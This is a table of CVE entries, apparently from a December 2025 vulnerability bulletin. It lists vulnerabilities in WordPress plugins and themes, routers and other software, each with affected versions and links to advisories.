| WP Chill--Passster | Insertion of Sensitive Information Into Sent Data vulnerability in WP Chill Passster content-protector allows Retrieve Embedded Sensitive Data.This issue affects Passster: from n/a through <= 4.2.19. | 2025-12-18 | not yet calculated | CVE-2025-64218 | https://vdp.patchstack.com/database/Wordpress/Plugin/content-protector/vulnerability/wordpress-passster-plugin-4-2-19-sensitive-data-exposure-vulnerability?_s_id=cve |
| designthemes--Reservation Plugin | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes Reservation Plugin dt-reservation-plugin allows Reflected XSS.This issue affects Reservation Plugin: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-64221 | https://vdp.patchstack.com/database/Wordpress/Plugin/dt-reservation-plugin/vulnerability/wordpress-reservation-plugin-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FantasticPlugins--WooCommerce Recover Abandoned Cart | Missing Authorization vulnerability in FantasticPlugins WooCommerce Recover Abandoned Cart rac allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Recover Abandoned Cart: from n/a through <= 24.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64222 | https://vdp.patchstack.com/database/Wordpress/Plugin/rac/vulnerability/wordpress-woocommerce-recover-abandoned-cart-plugin-24-6-0-arbitrary-content-deletion-vulnerability?_s_id=cve |
| PenciDesign--PenNews | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in PenciDesign PenNews pennews allows PHP Local File Inclusion.This issue affects PenNews: from n/a through < 6.7.3. | 2025-12-18 | not yet calculated | CVE-2025-64223 | https://vdp.patchstack.com/database/Wordpress/Theme/pennews/vulnerability/wordpress-pennews-theme-6-7-3-local-file-inclusion-vulnerability?_s_id=cve |
| colabrio--Stockie Extra | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in colabrio Stockie Extra stockie-extra allows Code Injection.This issue affects Stockie Extra: from n/a through <= 1.2.11. | 2025-12-18 | not yet calculated | CVE-2025-64225 | https://vdp.patchstack.com/database/Wordpress/Plugin/stockie-extra/vulnerability/wordpress-stockie-extra-plugin-1-2-11-content-injection-vulnerability?_s_id=cve |
| BoldGrid--Client Invoicing by Sprout Invoices | Deserialization of Untrusted Data vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows Object Injection.This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.7. | 2025-12-18 | not yet calculated | CVE-2025-64227 | https://vdp.patchstack.com/database/Wordpress/Plugin/sprout-invoices/vulnerability/wordpress-client-invoicing-by-sprout-invoices-plugin-20-8-7-php-object-injection-vulnerability?_s_id=cve |
| WP Chill--Filr | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP Chill Filr filr-protection allows Path Traversal.This issue affects Filr: from n/a through <= 1.2.10. | 2025-12-18 | not yet calculated | CVE-2025-64230 | https://vdp.patchstack.com/database/Wordpress/Plugin/filr-protection/vulnerability/wordpress-filr-plugin-1-2-10-arbitrary-file-deletion-vulnerability?_s_id=cve |
| RedefiningTheWeb--WordPress Contact Form 7 PDF, Google Sheet & Database | Unrestricted Upload of File with Dangerous Type vulnerability in RedefiningTheWeb WordPress Contact Form 7 PDF, Google Sheet & Database rtwwcfp-wordpress-contact-form-7-pdf allows Using Malicious Files.This issue affects WordPress Contact Form 7 PDF, Google Sheet & Database: from n/a through <= 3.0.0. | 2025-12-18 | not yet calculated | CVE-2025-64231 | https://vdp.patchstack.com/database/Wordpress/Plugin/rtwwcfp-wordpress-contact-form-7-pdf/vulnerability/wordpress-wordpress-contact-form-7-pdf-google-sheet-database-plugin-3-0-0-arbitrary-file-upload-vulnerability?_s_id=cve |
| BoldThemes--Codiqa | Deserialization of Untrusted Data vulnerability in BoldThemes Codiqa codiqa allows Object Injection.This issue affects Codiqa: from n/a through < 1.2.8. | 2025-12-18 | not yet calculated | CVE-2025-64233 | https://vdp.patchstack.com/database/Wordpress/Theme/codiqa/vulnerability/wordpress-codiqa-theme-1-2-8-php-object-injection-vulnerability?_s_id=cve |
| Graham--Quick Interest Slider | Cross-Site Request Forgery (CSRF) vulnerability in Graham Quick Interest Slider quick-interest-slider allows Cross Site Request Forgery.This issue affects Quick Interest Slider: from n/a through <= 3.1.5. | 2025-12-16 | not yet calculated | CVE-2025-64237 | https://vdp.patchstack.com/database/Wordpress/Plugin/quick-interest-slider/vulnerability/wordpress-quick-interest-slider-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| NicolasKulka--WPS Bidouille | Missing Authorization vulnerability in NicolasKulka WPS Bidouille wps-bidouille allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPS Bidouille: from n/a through <= 1.33.1. | 2025-12-16 | not yet calculated | CVE-2025-64238 | https://vdp.patchstack.com/database/Wordpress/Plugin/wps-bidouille/vulnerability/wordpress-wps-bidouille-plugin-1-33-1-broken-access-control-vulnerability?_s_id=cve |
| Yoav Farhi--RTL Tester | Cross-Site Request Forgery (CSRF) vulnerability in Yoav Farhi RTL Tester rtl-tester allows Cross Site Request Forgery.This issue affects RTL Tester: from n/a through <= 1.2. | 2025-12-16 | not yet calculated | CVE-2025-64239 | https://vdp.patchstack.com/database/Wordpress/Plugin/rtl-tester/vulnerability/wordpress-rtl-tester-plugin-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| freshchat--Freshchat | Cross-Site Request Forgery (CSRF) vulnerability in freshchat Freshchat freshchat allows Cross Site Request Forgery.This issue affects Freshchat: from n/a through <= 2.3.4. | 2025-12-16 | not yet calculated | CVE-2025-64240 | https://vdp.patchstack.com/database/Wordpress/Plugin/freshchat/vulnerability/wordpress-freshchat-plugin-2-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Imtiaz Rayhan--WP Coupons and Deals | Missing Authorization vulnerability in Imtiaz Rayhan WP Coupons and Deals wp-coupons-and-deals allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Coupons and Deals: from n/a through <= 3.2.4. | 2025-12-16 | not yet calculated | CVE-2025-64241 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-coupons-and-deals/vulnerability/wordpress-wp-coupons-and-deals-plugin-3-2-4-broken-access-control-vulnerability?_s_id=cve |
| Merv Barrett--Easy Property Listings | Missing Authorization vulnerability in Merv Barrett Easy Property Listings easy-property-listings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Property Listings: from n/a through <= 3.5.15. | 2025-12-16 | not yet calculated | CVE-2025-64242 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-property-listings/vulnerability/wordpress-easy-property-listings-plugin-3-5-15-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Directory Pro | Missing Authorization vulnerability in e-plugins Directory Pro directory-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Directory Pro: from n/a through <= 2.5.6. | 2025-12-16 | not yet calculated | CVE-2025-64243 | https://vdp.patchstack.com/database/Wordpress/Plugin/directory-pro/vulnerability/wordpress-directory-pro-plugin-2-5-6-broken-access-control-vulnerability?_s_id=cve |
| Codexpert, Inc--Restrict Elementor Widgets, Columns and Sections | Missing Authorization vulnerability in Codexpert, Inc Restrict Elementor Widgets, Columns and Sections restrict-elementor-widgets allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restrict Elementor Widgets, Columns and Sections: from n/a through <= 1.12. | 2025-12-16 | not yet calculated | CVE-2025-64244 | https://vdp.patchstack.com/database/Wordpress/Plugin/restrict-elementor-widgets/vulnerability/wordpress-restrict-elementor-widgets-columns-and-sections-plugin-1-12-broken-access-control-vulnerability?_s_id=cve |
| ryanpcmcquen--Import external attachments | Missing Authorization vulnerability in ryanpcmcquen Import external attachments import-external-attachments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Import external attachments: from n/a through <= 1.5.12. | 2025-12-16 | not yet calculated | CVE-2025-64245 | https://vdp.patchstack.com/database/Wordpress/Plugin/import-external-attachments/vulnerability/wordpress-import-external-attachments-plugin-1-5-12-broken-access-control-vulnerability?_s_id=cve |
| netopsae--Accessibility by AudioEye | Missing Authorization vulnerability in netopsae Accessibility by AudioEye accessibility-by-audioeye allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accessibility by AudioEye: from n/a through <= 1.0.49. | 2025-12-16 | not yet calculated | CVE-2025-64246 | https://vdp.patchstack.com/database/Wordpress/Plugin/accessibility-by-audioeye/vulnerability/wordpress-accessibility-by-audioeye-plugin-1-0-49-broken-access-control-vulnerability?_s_id=cve |
| edmon.parker--Read More & Accordion | Missing Authorization vulnerability in edmon.parker Read More & Accordion expand-maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Read More & Accordion: from n/a through <= 3.5.4.1. | 2025-12-16 | not yet calculated | CVE-2025-64247 | https://vdp.patchstack.com/database/Wordpress/Plugin/expand-maker/vulnerability/wordpress-read-more-accordion-plugin-3-5-4-1-broken-access-control-vulnerability?_s_id=cve |
| emarket-design--Request a Quote | Missing Authorization vulnerability in emarket-design Request a Quote request-a-quote allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Request a Quote: from n/a through <= 2.5.3. | 2025-12-16 | not yet calculated | CVE-2025-64248 | https://vdp.patchstack.com/database/Wordpress/Plugin/request-a-quote/vulnerability/wordpress-request-a-quote-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
| WP-EXPERTS.IN--Protect WP Admin | Missing Authorization vulnerability in WP-EXPERTS.IN Protect WP Admin protect-wp-admin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Protect WP Admin: from n/a through <= 4.1. | 2025-12-16 | not yet calculated | CVE-2025-64249 | https://vdp.patchstack.com/database/Wordpress/Plugin/protect-wp-admin/vulnerability/wordpress-protect-wp-admin-plugin-4-1-broken-access-control-vulnerability?_s_id=cve |
| wpWax--Directorist | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in wpWax Directorist directorist allows Phishing.This issue affects Directorist: from n/a through <= 8.5.6. | 2025-12-16 | not yet calculated | CVE-2025-64250 | https://vdp.patchstack.com/database/Wordpress/Plugin/directorist/vulnerability/wordpress-directorist-plugin-8-5-6-open-redirection-vulnerability?_s_id=cve |
| azzaroco--Ultimate Learning Pro | Missing Authorization vulnerability in azzaroco Ultimate Learning Pro indeed-learning-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Learning Pro: from n/a through <= 3.9.3. | 2025-12-16 | not yet calculated | CVE-2025-64251 | https://vdp.patchstack.com/database/Wordpress/Plugin/indeed-learning-pro/vulnerability/wordpress-ultimate-learning-pro-plugin-3-9-3-arbitrary-content-deletion-vulnerability?_s_id=cve |
| WordPress.org--Health Check & Troubleshooting | Path Traversal: '.../...//' vulnerability in WordPress.org Health Check & Troubleshooting health-check allows Path Traversal.This issue affects Health Check & Troubleshooting: from n/a through <= 1.7.1. | 2025-12-16 | not yet calculated | CVE-2025-64253 | https://vdp.patchstack.com/database/Wordpress/Plugin/health-check/vulnerability/wordpress-health-check-troubleshooting-plugin-1-7-1-path-traversal-vulnerability?_s_id=cve |
| wpweb--Follow My Blog Post | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in wpweb Follow My Blog Post follow-my-blog-post allows Retrieve Embedded Sensitive Data.This issue affects Follow My Blog Post: from n/a through <= 2.3.9. | 2025-12-18 | not yet calculated | CVE-2025-64258 | https://vdp.patchstack.com/database/Wordpress/Plugin/follow-my-blog-post/vulnerability/wordpress-follow-my-blog-post-plugin-2-3-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| Marco Milesi--ANAC XML Bandi di Gara | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marco Milesi ANAC XML Bandi di Gara avcp allows Reflected XSS.This issue affects ANAC XML Bandi di Gara: from n/a through <= 7.7. | 2025-12-18 | not yet calculated | CVE-2025-64260 | https://vdp.patchstack.com/database/Wordpress/Plugin/avcp/vulnerability/wordpress-anac-xml-bandi-di-gara-plugin-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| magepeopleteam--Booking and Rental Manager | Deserialization of Untrusted Data vulnerability in magepeopleteam Booking and Rental Manager booking-and-rental-manager-for-woocommerce allows Object Injection.This issue affects Booking and Rental Manager: from n/a through <= 2.5.4. | 2025-12-18 | not yet calculated | CVE-2025-64266 | https://vdp.patchstack.com/database/Wordpress/Plugin/booking-and-rental-manager-for-woocommerce/vulnerability/wordpress-booking-and-rental-manager-plugin-2-5-4-php-object-injection-vulnerability?_s_id=cve |
| Arraytics--Timetics | Missing Authorization vulnerability in Arraytics Timetics timetics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Timetics: from n/a through <= 1.0.44. | 2025-12-18 | not yet calculated | CVE-2025-64268 | https://vdp.patchstack.com/database/Wordpress/Plugin/timetics/vulnerability/wordpress-timetics-plugin-1-0-44-broken-access-control-vulnerability?_s_id=cve |
| masteriyo--Masteriyo - LMS | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in masteriyo Masteriyo - LMS learning-management-system allows Retrieve Embedded Sensitive Data.This issue affects Masteriyo - LMS: from n/a through <= 2.0.3. | 2025-12-18 | not yet calculated | CVE-2025-64270 | https://vdp.patchstack.com/database/Wordpress/Plugin/learning-management-system/vulnerability/wordpress-masteriyo-lms-plugin-2-0-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| GetResponse--Email marketing for WordPress by GetResponse Official | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in GetResponse Email marketing for WordPress by GetResponse Official getresponse-official allows Retrieve Embedded Sensitive Data.This issue affects Email marketing for WordPress by GetResponse Official: from n/a through <= 1.5.3. | 2025-12-18 | not yet calculated | CVE-2025-64272 | https://vdp.patchstack.com/database/Wordpress/Plugin/getresponse-official/vulnerability/wordpress-email-marketing-for-wordpress-by-getresponse-official-plugin-1-5-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| GetResponse--Email marketing for WordPress by GetResponse Official | Missing Authorization vulnerability in GetResponse Email marketing for WordPress by GetResponse Official getresponse-official allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Email marketing for WordPress by GetResponse Official: from n/a through <= 1.5.3. | 2025-12-18 | not yet calculated | CVE-2025-64273 | https://vdp.patchstack.com/database/Wordpress/Plugin/getresponse-official/vulnerability/wordpress-email-marketing-for-wordpress-by-getresponse-official-plugin-1-5-3-broken-access-control-vulnerability?_s_id=cve |
| Syed Balkhi--All In One SEO Pack | Insertion of Sensitive Information Into Sent Data vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Retrieve Embedded Sensitive Data.This issue affects All In One SEO Pack: from n/a through <= 4.8.6.1. | 2025-12-18 | not yet calculated | CVE-2025-64295 | https://vdp.patchstack.com/database/Wordpress/Plugin/all-in-one-seo-pack/vulnerability/wordpress-all-in-one-seo-pack-plugin-4-8-6-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. In versions 5.5.2 - #156 and below, an authenticated regular user can create a photo collection whose Collection Name contains HTML/JavaScript payloads, which making ClipBucket's Manage Photos feature vulnerable to Stored XSS. The payload is rendered unsafely in the Admin → Manage Photos interface, causing it to execute in the administrator's browser, therefore allowing an attacker to target administrators and perform actions with elevated privileges. This issue is fixed in version 5.5.2 - #157. | 2025-12-15 | not yet calculated | CVE-2025-64338 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-93rh-fxxx-j38j https://github.com/MacWarrior/clipbucket-v5/commit/8e3cf79ce2721fbebde68a05a9a1a6319f086bcc |
| shinetheme--Traveler | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection.This issue affects Traveler: from n/a through < 3.2.6. | 2025-12-18 | not yet calculated | CVE-2025-64371 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-sql-injection-vulnerability?_s_id=cve |
| shinetheme--Traveler | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in shinetheme Traveler traveler allows Reflected XSS.This issue affects Traveler: from n/a through < 3.2.6. | 2025-12-18 | not yet calculated | CVE-2025-64372 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| shinetheme--Traveler | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in shinetheme Traveler traveler allows PHP Local File Inclusion.This issue affects Traveler: from n/a through < 3.2.6. | 2025-12-18 | not yet calculated | CVE-2025-64373 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-local-file-inclusion-vulnerability?_s_id=cve |
| StylemixThemes--Motors | Unrestricted Upload of File with Dangerous Type vulnerability in StylemixThemes Motors motors allows Using Malicious Files.This issue affects Motors: from n/a through <= 5.6.81. | 2025-12-18 | not yet calculated | CVE-2025-64374 | https://vdp.patchstack.com/database/Wordpress/Theme/motors/vulnerability/wordpress-motors-theme-5-6-80-arbitrary-file-upload-vulnerability?_s_id=cve |
| Mahmudul Hasan Arif--WP Social Ninja | Missing Authorization vulnerability in Mahmudul Hasan Arif WP Social Ninja wp-social-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Social Ninja: from n/a through <= 3.20.1. | 2025-12-18 | not yet calculated | CVE-2025-64375 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-social-reviews/vulnerability/wordpress-wp-social-ninja-plugin-3-20-1-broken-access-control-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro listingpro allows Reflected XSS.This issue affects ListingPro: from n/a through < 2.9.10. | 2025-12-18 | not yet calculated | CVE-2025-64376 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-10-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CridioStudio ListingPro listingpro allows PHP Local File Inclusion.This issue affects ListingPro: from n/a through < 2.9.10. | 2025-12-18 | not yet calculated | CVE-2025-64377 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-10-local-file-inclusion-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through < 2.9.10. | 2025-12-18 | not yet calculated | CVE-2025-64378 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-10-broken-access-control-vulnerability?_s_id=cve |
| Strategy11 Team--Business Directory | Missing Authorization vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Business Directory: from n/a through <= 6.4.19. | 2025-12-16 | not yet calculated | CVE-2025-64630 | https://vdp.patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-19-broken-access-control-vulnerability?_s_id=cve |
| WC Lovers--WCFM Marketplace | Missing Authorization vulnerability in WC Lovers WCFM Marketplace wc-multivendor-marketplace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCFM Marketplace: from n/a through <= 3.6.15. | 2025-12-16 | not yet calculated | CVE-2025-64631 | https://vdp.patchstack.com/database/Wordpress/Plugin/wc-multivendor-marketplace/vulnerability/wordpress-wcfm-marketplace-plugin-3-6-15-broken-access-control-vulnerability?_s_id=cve |
| Auctollo--Google XML Sitemaps | Missing Authorization vulnerability in Auctollo Google XML Sitemaps google-sitemap-generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Google XML Sitemaps: from n/a through <= 4.1.21. | 2025-12-16 | not yet calculated | CVE-2025-64632 | https://vdp.patchstack.com/database/Wordpress/Plugin/google-sitemap-generator/vulnerability/wordpress-google-xml-sitemaps-plugin-4-1-21-broken-access-control-vulnerability?_s_id=cve |
| colabrio--Norebro Extra | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in colabrio Norebro Extra norebro-extra allows Code Injection.This issue affects Norebro Extra: from n/a through <= 1.6.8. | 2025-12-16 | not yet calculated | CVE-2025-64633 | https://vdp.patchstack.com/database/Wordpress/Plugin/norebro-extra/vulnerability/wordpress-norebro-extra-plugin-1-6-8-content-injection-vulnerability?_s_id=cve |
| ThemeFusion--Avada | Missing Authorization vulnerability in ThemeFusion Avada avada allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Avada: from n/a through <= 7.13.1. | 2025-12-16 | not yet calculated | CVE-2025-64634 | https://vdp.patchstack.com/database/Wordpress/Theme/avada/vulnerability/wordpress-avada-theme-7-13-1-broken-access-control-vulnerability?_s_id=cve |
| Syed Balkhi--Feeds for YouTube | Missing Authorization vulnerability in Syed Balkhi Feeds for YouTube feeds-for-youtube allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Feeds for YouTube: from n/a through <= 2.4.0. | 2025-12-16 | not yet calculated | CVE-2025-64635 | https://vdp.patchstack.com/database/Wordpress/Plugin/feeds-for-youtube/vulnerability/wordpress-feeds-for-youtube-plugin-2-4-0-broken-access-control-vulnerability?_s_id=cve |
| OnPay.io--OnPay.io for WooCommerce | Missing Authorization vulnerability in OnPay.io OnPay.io for WooCommerce onpay-io-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects OnPay.io for WooCommerce: from n/a through <= 1.0.47. | 2025-12-16 | not yet calculated | CVE-2025-64638 | https://vdp.patchstack.com/database/Wordpress/Plugin/onpay-io-for-woocommerce/vulnerability/wordpress-onpay-io-for-woocommerce-plugin-1-0-47-broken-access-control-vulnerability?_s_id=cve |
| WP Compress--WP Compress for MainWP | Missing Authorization vulnerability in WP Compress WP Compress for MainWP wp-compress-mainwp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Compress for MainWP: from n/a through <= 6.50.07. | 2025-12-16 | not yet calculated | CVE-2025-64639 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-compress-mainwp/vulnerability/wordpress-wp-compress-for-mainwp-plugin-6-50-07-broken-access-control-vulnerability?_s_id=cve |
| GROWI, Inc.--GROWI | Cross-site request forgery vulnerability exists in GROWI v7.3.3 and earlier. If a user views a malicious page while logged in, the user may be tricked to do unintended operations. | 2025-12-17 | not yet calculated | CVE-2025-64700 | https://growi.co.jp/news/40/ https://jvn.jp/en/jp/JVN55745775/ |
| arduino--arduino-ide | Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS was configured with overly permissive security entitlements that could bypass macOS Hardened Runtime protections. This configuration allows attackers to inject malicious dynamic libraries into the application process, gaining access to all TCC (Transparency, Consent, and Control) permissions granted to the application. The fix is included starting from the `2.3.7 ` release. | 2025-12-18 | not yet calculated | CVE-2025-64723 | https://github.com/arduino/arduino-ide/security/advisories/GHSA-vf5j-xhwq-8vqj https://github.com/arduino/arduino-ide/pull/2805/commits/2f7667136ee95ce07dde23c49d2de526b45e3293 https://github.com/arduino/arduino-ide/releases/tag/2.3.7 https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities |
| arduino--arduino-ide | Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS is installed with world-writable file permissions on sensitive application components, allowing any local user to replace legitimate files with malicious code. When another user launches the application, the malicious code executes with that user's privileges, enabling privilege escalation and unauthorized access to sensitive data. The fix is included starting from the `2.3.7` release. | 2025-12-18 | not yet calculated | CVE-2025-64724 | https://github.com/arduino/arduino-ide/security/advisories/GHSA-3fvj-pgqw-fgw6 https://github.com/arduino/arduino-ide/pull/2805/commits/5d282f38496e96dcba02818536c0835bd684ec98 https://github.com/arduino/arduino-ide/releases/tag/2.3.7 https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15, it was possible to accept an invitation opened by a different user. Version 5.15. contains a patch. As a workaround, avoid leaving one's Weblate sessions with an invitation opened unattended. | 2025-12-15 | not yet calculated | CVE-2025-64725 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-m6hq-f4w9-qrjj https://github.com/WeblateOrg/weblate/pull/16913 https://github.com/WeblateOrg/weblate/commit/02e904675f0608a6bbfbf9466eeccd9d022591e9 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15 |
| Checkmk GmbH--Checkmk | Insufficient permission validation in Checkmk versions prior to 2.4.0p17 and 2.3.0p42 allow low-privileged users to view agent information via the REST API, which could lead to information disclosure. | 2025-12-18 | not yet calculated | CVE-2025-64997 | https://checkmk.com/werk/18681 |
| Checkmk GmbH--Checkmk | SSH private keys of the "Remote alert handlers (Linux)" rule were exposed in the rule page's HTML source in Checkmk <= 2.4.0p18 and all versions of Checkmk 2.3.0. This potentially allowed unauthorized triggering of predefined alert handlers on hosts where the handler was deployed. | 2025-12-18 | not yet calculated | CVE-2025-65000 | https://checkmk.com/werk/19030 |
| WODESYS--WD-R608U | In WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28) due to lack of authentication in the configuration change module in the adm.cgi endpoint, the unauthenticated attacker can execute commands including backup creation, device restart and resetting the device to factory settings. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65007 | http://www.wodesys.com/eproductms52.html https://cert.pl/en/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | In WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28) due to lack of validation in the langGet parameter in the adm.cgi endpoint, the malicious attacker can execute system shell commands. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65008 | http://www.wodesys.com/eproductms52.html https://cert.pl/en/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | In WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28) admin password is stored in configuration file as plaintext and can be obtained by unauthorized user by direct references to the resource in question. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65009 | http://www.wodesys.com/eproductms52.html https://cert.pl/en/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28) is vulnerable to Broken Access Control in initial configuration wizard.cgi endpoint. Malicious attacker can change admin panel password without authorization. The vulnerability can also be exploited after the initial configuration has been set. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65010 | http://www.wodesys.com/eproductms52.html https://cert.pl/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WODESYS--WD-R608U | In WODESYS WD-R608U router (also known as WDR122B V2.0 and WDR28) an unauthorised user can view configuration files by directly referencing the resource in question. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version WDR28081123OV1.01 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-12-18 | not yet calculated | CVE-2025-65011 | http://www.wodesys.com/eproductms52.html https://cert.pl/posts/2025/12/CVE-2025-65007 https://github.com/wcyb/security_research |
| WaveStore--WaveStore Server | WaveView client allows users to execute restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high-privileges is able to execute arbitrary OS commands on the server using path traversal in the showerr script. This issue was fixed in version 6.44.44 | 2025-12-16 | not yet calculated | CVE-2025-65074 | https://cert.pl/en/posts/2025/12/CVE-2025-65074 https://www.wavestore.com/products/video-management-software |
| WaveStore--WaveStore Server | WaveView client allows users to execute restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high-privileges is able to read or delete files, with the permissions of dvr user, on the server using path traversal in the alog script. This issue was fixed in version 6.44.44 | 2025-12-16 | not yet calculated | CVE-2025-65075 | https://cert.pl/en/posts/2025/12/CVE-2025-65074 https://www.wavestore.com/products/video-management-software |
| WaveStore--WaveStore Server | WaveView client allows users to execute restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high-privileges is able to read or delete any file on the server using path traversal in the ilog script. This script is being run with root privileges. This issue was fixed in version 6.44.44 | 2025-12-16 | not yet calculated | CVE-2025-65076 | https://cert.pl/en/posts/2025/12/CVE-2025-65074 https://www.wavestore.com/products/video-management-software |
